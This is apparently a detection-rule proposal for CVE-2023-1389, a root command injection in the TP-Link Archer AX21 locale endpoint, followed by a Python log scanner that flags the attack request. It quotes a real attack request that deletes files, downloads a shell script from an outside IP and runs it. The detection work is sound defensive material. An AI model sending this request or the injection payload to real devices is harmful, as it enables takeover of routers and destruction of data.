Description of the Idea of the Rule
A security vulnerability was identified in the TP-Link Archer AX21 (AX1800). This vulnerability involves a command injection flaw present in the country form of the /cgi-bin/luci;stok=/locale endpoint within the web management interface. The issue arises from inadequate sanitization of the country parameter during a write operation, leading to its use in a call to popen(). Consequently, an unauthorized attacker can exploit this vulnerability by sending a simple GET request to inject arbitrary commands. The injected commands run with root privileges, posing a risk to the system's security.
I have seen this exploit query in my client environment recently.
Attacker command:-
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget hxxp://45.142.214.108/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)
Public References / Example Event Log
https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
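
A detection sketch for the request pattern described in this issue, added here as an example and not part of the original post or of any project's rule: it flags access-log lines that reach the locale endpoint with `form=country` and shell metacharacters in the `country` value. The combined-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Both spellings seen on the page: /cgi-bin/luci;stok=/locale and /cgi-bin/luci/;stok=/locale
LOCALE_PATH = re.compile(r"^/cgi-bin/luci/?;stok=[^/]*/locale$")
# Characters that let a value break out into a shell command once it reaches popen().
SHELL_META = re.compile(r"[$`;|&<>(){}\n]")
# Request line of a combined-format access log entry (assumed format); tolerates raw spaces.
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def suspicious_country(target):
    """Return the decoded country value for an injection-looking request, else None."""
    path, _, query = target.partition("?")
    if not LOCALE_PATH.match(unquote(path)):
        return None
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    if "country" not in params.get("form", []):
        return None
    # Flag the first country value that carries shell metacharacters after URL decoding.
    return next((v for v in params.get("country", []) if SHELL_META.search(v)), None)

def scan(lines):
    """Return [(line_number, decoded_country)] for flagged access-log lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = suspicious_country(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, harmless payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28id%29 HTTP/1.1" 200 34',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/luci/;stok=abc123/locale?form=country&operation=read HTTP/1.1" 200 51',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "POST /cgi-bin/luci;stok=/locale?form=country&operation=write&country=$(id; uname -a) HTTP/1.1" 200 34',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/luci/;stok=abc123/locale?form=country&operation=write&country=US HTTP/1.1" 200 34',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: country={value!r}")
```

The check decodes the value once before matching, so percent-encoded and raw payloads are both caught; a proxy or WAF that logs a different line format needs its own `REQUEST` pattern.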